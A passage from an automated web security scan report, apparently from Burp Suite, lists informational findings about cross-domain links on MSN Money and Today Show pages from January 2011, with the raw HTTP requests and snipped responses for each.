<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.95. http://investing.money.redacted/investments/charts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/charts

Issue detail

The page was loaded from a URL containing a query string:

http://investing.money.redacted/investments/charts?Symbol=indu

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://calendar.live.com/
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://www.batstrading.com/
http://www.bing.com/customizeBrowser
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&resize=false

Request

GET /investments/charts?Symbol=indu HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.96. http://investing.money.redacted/investments/currency-exchange-rates/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/currency-exchange-rates/

Issue detail

The page was loaded from a URL containing a query string:

http://investing.money.redacted/investments/currency-exchange-rates/?symbol=

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://calendar.live.com/
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://www.bing.com/customizeBrowser
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&resize=false

Request

GET /investments/currency-exchange-rates/?symbol= HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.97. http://investing.money.redacted/investments/market-index/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/market-index/

Issue detail

The page was loaded from a URL containing a query string:

http://investing.money.redacted/investments/market-index/?symbol=

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://calendar.live.com/
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://www.bing.com/customizeBrowser
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&resize=false

Request

GET /investments/market-index/?symbol= HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.98. http://investing.money.redacted/investments/stock-price previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/stock-price

Issue detail

The page was loaded from a URL containing a query string:

http://investing.money.redacted/investments/stock-price?Symbol=

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://calendar.live.com/
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://www.bing.com/customizeBrowser
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.myhomeredacted/
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&resize=false

Request

GET /investments/stock-price?Symbol= HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.99. http://investing.money.redacted/investments/stock-price/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/stock-price/

Issue detail

The page was loaded from a URL containing a query string:

http://investing.money.redacted/investments/stock-price/?Symbol=US:EP

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://calendar.live.com/
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://money.bundle.com/categories/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://www.batstrading.com/
http://www.bing.com/customizeBrowser
http://www.bing.com/finance/stockscreener
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-estimate-revisions-for-jan-3-table-.html?cmpid=msnmoney
http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-recommendation-changes-for-jan-3-table-.html?cmpid=msnmoney
http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-target-price-changes-for-jan-3-table-.html?cmpid=msnmoney
http://www.bloomberg.com/news/2011-01-26/crown-castle-e-trade-netflix-starbucks-u-s-equity-preview.html?cmpid=msnmoney
http://www.bloomberg.com/news/2011-01-26/el-paso-investigates-possible-second-offshore-gas-pipeline-leak.html?cmpid=msnmoney
http://www.bloomberg.com/news/2011-01-27/u-s-companies-issuing-profit-outlooks-for-jan-27-table-.html?cmpid=msnmoney
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.reuters.com/article/marketsNews/idUSN2729479520110127?rpc=77
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&resize=false

Request

GET /investments/stock-price/?Symbol=US:EP HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:41 GMT
Content-Length: 79757
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
,Earnings/Share,Dividend/Share,Current Div. Yield,Market Capitalization,Shares outstanding,El Paso Corp,US:EP,El Paso Corp quote,US:EP quote,El Paso Corp change,US:EP change,El Paso Corp last quote" /><link rel="Shortcut Icon" href="http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="http://investing.money.redacted/sc/css/b0/8f83b90988ff7b93ae75bc90f904a8.css" media="all" />
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a></li><li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
<a href="http://mail.live.com/" class="flytrigger unreadcount">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com/">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a>
...[SNIP]...
<li class="first ">
<a id="hplink" href="http://www.myhomeredacted/">Make MSN your homepage</a>
<a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search">
Web</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li class="flyout noscript"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-recommendation-changes-for-jan-3-table-.html?cmpid=msnmoney">S&P 500 Analyst Recommendation Changes for Jan. 28</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-estimate-revisions-for-jan-3-table-.html?cmpid=msnmoney">S&P 500 Analyst Estimate Revisions for Jan. 28</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-03/s-p-500-analyst-target-price-changes-for-jan-3-table-.html?cmpid=msnmoney">S&P 500 Analyst Target Price Changes for Jan. 28</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-27/u-s-companies-issuing-profit-outlooks-for-jan-27-table-.html?cmpid=msnmoney">U.S. Companies Issuing Profit Outlooks for Jan. 27</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-26/crown-castle-e-trade-netflix-starbucks-u-s-equity-preview.html?cmpid=msnmoney">AT&T, El Paso, Procter & Gamble, Sara Lee: U.S. Equity Movers</a>
...[SNIP]...
<div><a href="http://www.reuters.com/article/marketsNews/idUSN2729479520110127?rpc=77">UPDATE 2-El Paso hedges 2011 energy prices above market</a>
...[SNIP]...
<div><a href="http://www.bloomberg.com/news/2011-01-26/el-paso-investigates-possible-second-offshore-gas-pipeline-leak.html?cmpid=msnmoney">El Paso Investigates Possible Second Offshore Gas Pipeline Leak</a>
...[SNIP]...
<div class="br br1 brl" >

<script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" >Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" >click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/" >BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" >Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" >Morningstar Inc</a>. Analyst recommendations data provided by <a href="http://www.zacks.com/" >Zacks Investment Research</a>... IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" >Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm" >SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" >Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" >CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a>
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >Feedback</a>
...[SNIP]...
<li class=" first">
<a href="http://www.bing.com/finance/stockscreener" title="Stock screener on Bing">Stock screener on Bing</a>
...[SNIP]...
<li class="">
<a href="http://money.bundle.com/categories/" title="Message boards on Bundle">Message boards on Bundle</a>
...[SNIP]...
</a>
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise</a>
...[SNIP]...
<li class="last"><a class="popuplink" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&resize=false">Feedback</a>
...[SNIP]...

22.100. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifeinc.todayshow.com
Path:	/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Issue detail

The page was loaded from a URL containing a query string:

http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001

The response contains the following links to other domains:

http://add42162.newsvine.com/
http://agbroadhurst.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alice-mc.newsvine.com/
http://allison-linnmsnbc.newsvine.com/
http://ann1638814.newsvine.com/
http://astrocenter.astrology.redacted/
http://autos.redacted/
http://basedrum777.newsvine.com/
http://bday.newsvine.com/
http://becky2120568.newsvine.com/
http://benlam1.newsvine.com/
http://bertfw.newsvine.com/
http://bill-horin.newsvine.com/
http://billmarvell.newsvine.com/
http://bit.ly/gFYrpS
http://blog.penelopetrunk.com/
http://blogs.consumerreports.org/baby/
http://blogs.consumerreports.org/money/
http://blogs.wsj.com/juggle/
http://borsiaii.newsvine.com/
http://bucks.blogs.nytimes.com/
http://careers.redacted/
http://cathy15.newsvine.com/
http://consumerist.com/
http://cschick2317.newsvine.com/
http://cygnus-x-1.newsvine.com/
http://dateline.msnbc.com/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://debi-1314897.newsvine.com/
http://derek-brockman.newsvine.com/
http://dmc2990950.newsvine.com/
http://fredevil.newsvine.com/
http://guylittle-1.newsvine.com/
http://hardball.msnbc.com/
http://haste502.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://ideaguy2.newsvine.com/
http://ihatethegovt.newsvine.com/
http://jerry194283.newsvine.com/
http://jimhenigman.newsvine.com/
http://johnthefree.newsvine.com/
http://jpcyphers.newsvine.com/
http://jstoler4156.newsvine.com/
http://knightrider3.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/lifeinc/style.css?v=23247
http://lib.newsvine.com/chrome/todaymartinblog/style.css?v=23247
http://littleadv.newsvine.com/
http://local.redacted/gas-traffic.aspx
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://log.newsvine.com/poke.gif?x=0|26&get=c5936478&rand=1156475061&do=todayshow.com&rf=http%3A%2F%2Flifeinc.todayshow.com%2F_news%2F2011%2F01%2F28%2F5936478-good-graph-friday-what-cheat-on-taxes-never%3Fgt1%3D43001&ad=68:68:279;44::;70:70:276;68:68:279;74:74:278
http://mikebrooks.newsvine.com/
http://mjweir.newsvine.com/
http://moms.today.com/
http://moneycentral.msn.com/detail/stock_quote
http://msk2877762.newsvine.com/
http://msn.whitepages.com/
http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Facebook-icon2.gif
http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/Twitter-icon2.gif
http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/alert.gif
http://msnbcmedia.redacted/i/MSNBC/SiteManagement/Newsletters/Assets/Photos/sm-mail.png
http://mtp.msnbc.com/
http://my.redacted/
http://n-wentworth.newsvine.com/
http://nightly.msnbc.com/
http://norris.blogs.nytimes.com/
http://ohmy999999.newsvine.com/
http://onthejob.45things.com/
http://peteroid69.newsvine.com/
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://realestate.redacted/
http://rick--ws--nc.newsvine.com/
http://roger-4.newsvine.com/
http://settersperch.newsvine.com/
http://smellyloretta.newsvine.com/
http://smmfdmh.newsvine.com/
http://smoss73.newsvine.com/
http://specials.redacted/alphabet.aspx
http://stevenkatz2.newsvine.com/
http://stretch291.newsvine.com/
http://sukdu.newsvine.com/
http://takethatback.newsvine.com/
http://teapartyfan.newsvine.com/
http://thelastword.msnbc.redacted/
http://thesenatehealth.newsvine.com/
http://today.msnbc.com/
http://today.msnbc.msn.com/
http://trudyp.newsvine.com/
http://trust2112.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/alinnmsnbc
http://twitter.com/share
http://twitter.com/todaymoney
http://twitter.com/todaymoney/
http://twl.newsvine.com/
http://video.redacted/video.aspx?mkt=en-us&from=MSNHP
http://wonderwall.redacted/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.economist.com/blogs/freeexchange
http://www.everyblock.com/
http://www.evetahmincioglu.com/web/blog/
http://www.facebook.com/home.php?
http://www.facebook.com/pages/Today-Money/152222541478430
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Today-Money/152222541478430
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never
http://www.facebook.com/todaymoney
http://www.hotmail.com/
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/html/HtmlSitemap0.html
http://www.msnbc.redacted/id/26613008/
http://www.msnbc.redacted/id/27365695/
http://www.msnbc.redacted/id/32027560
http://www.msnbc.redacted/id/32359544/
http://www.msnbc.redacted/id/3303511/
http://www.msnbc.redacted/id/3303540/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/e2a5a79d215988ddb0f116d757365d6a810c2d2e.css?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/d1e431bda25a167e695fb05acc6e0492371d9a89.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/allison-linnmsnbc-846208182.jpg
http://www.polls.newsvine.com/_vine/images/users/500/allison-linnmsnbc/5940862.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.ritholtz.com/blog/
http://www.suddenlyfrugal.com/
http://www.treasury.gov/irsob/
http://www.treasury.gov/irsob/reports/2011/IRSOB%202010%20Taxpayer%20Attitude%20Survey.pdf
http://yankinyerchain.newsvine.com/
http://yellowpages.msn.com/
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
http://zarkon.newsvine.com/
http://zone.redacted/en-us/home
https://lib.newsvine.com/chrome/today/images/favicon.ico
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

GET /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001 HTTP/1.1
Host: lifeinc.todayshow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=184
Date: Sat, 29 Jan 2011 23:47:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137460

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Life Inc. - Good Graph Fr
...[SNIP]...
<meta name="contentId" content="5936478" />
<link rel="shortcut icon" href="https://lib.newsvine.com/chrome/today/images/favicon.ico" type="image/x-icon" />
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://lifeinc.todayshow.com/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
